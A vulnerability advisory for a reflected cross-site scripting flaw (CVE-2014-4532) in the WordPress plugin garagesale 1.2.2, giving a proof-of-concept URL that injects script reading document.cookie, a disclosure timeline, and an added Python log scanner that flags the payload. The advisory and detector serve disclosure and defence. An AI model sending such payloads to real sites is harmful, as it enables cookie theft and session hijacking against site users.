wp-plugin : garagesale – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : garagesale

 

Affected Version : 1.2.2 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/garagesale/templates/printAdminUsersList_Footer.tpl.php?page=page%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
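
A detection-side view of the PoC above, as an added example that is not part of the original advisory: it scans web access-log lines for direct requests to the plugin's template files whose decoded `page` value contains anything beyond a plain slug. The slug allowlist, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Direct requests to the plugin's template files (path fragment taken from the PoC URL).
TEMPLATE_PATH = re.compile(r"/garagesale/templates/[^/?]+\.tpl\.php$", re.I)
# Assumption: a legitimate `page` value is a plain slug (letters, digits, _ . -).
SAFE_PAGE = re.compile(r"[A-Za-z0-9_.\-]*")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_page_values(request_target):
    """Return URL-decoded `page` values that fall outside the slug allowlist."""
    parts = urlsplit(request_target)
    if not TEMPLATE_PATH.search(parts.path):
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get("page", [])
    return [v for v in values if not SAFE_PAGE.fullmatch(v)]

def scan(log_lines):
    """Yield (line_number, decoded_value) for every flagged request."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for value in suspicious_page_values(m.group(1)):
            yield n, value

# Constructed sample access-log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Apr/2014:10:00:01 +0000] "GET /wordpress/?s=bike HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Apr/2014:10:00:05 +0000] "GET /wordpress/wp-content/wp-plugs/garagesale'
    '/templates/printAdminUsersList_Footer.tpl.php?page=page%22%3C/script%3E%3Cscript%3E'
    'alert%28document.cookie%29%3C/script%3E& HTTP/1.1" 200 312',
    '203.0.113.9 - - [25/Apr/2014:10:00:09 +0000] "GET /wordpress/wp-content/wp-plugs/garagesale'
    '/templates/printAdminUsersList_Footer.tpl.php?page=users HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: page={value!r}")
```

Matching is done on the decoded value, so the same rule catches the payload whether or not the quote and angle brackets arrive percent-encoded.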

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4532

 
Plugin Description :
 
This plugin is a lightweight solution to put a kind of garage sale on your WordPress page.

Users can put their stuff with a picture, description, price and contact on a WordPress site.
The users are WordPress users with access right Subscriber (so every registered user can use the garage sale).

Put the string "[GarageSaleList]" on any page or article post where you want to display the list of sale items.

This plugin creates its own subfolder within the upload folder for the pictures.

Look at http://www.eibler.at/garagesale/ for a detailed description of usage and installation.
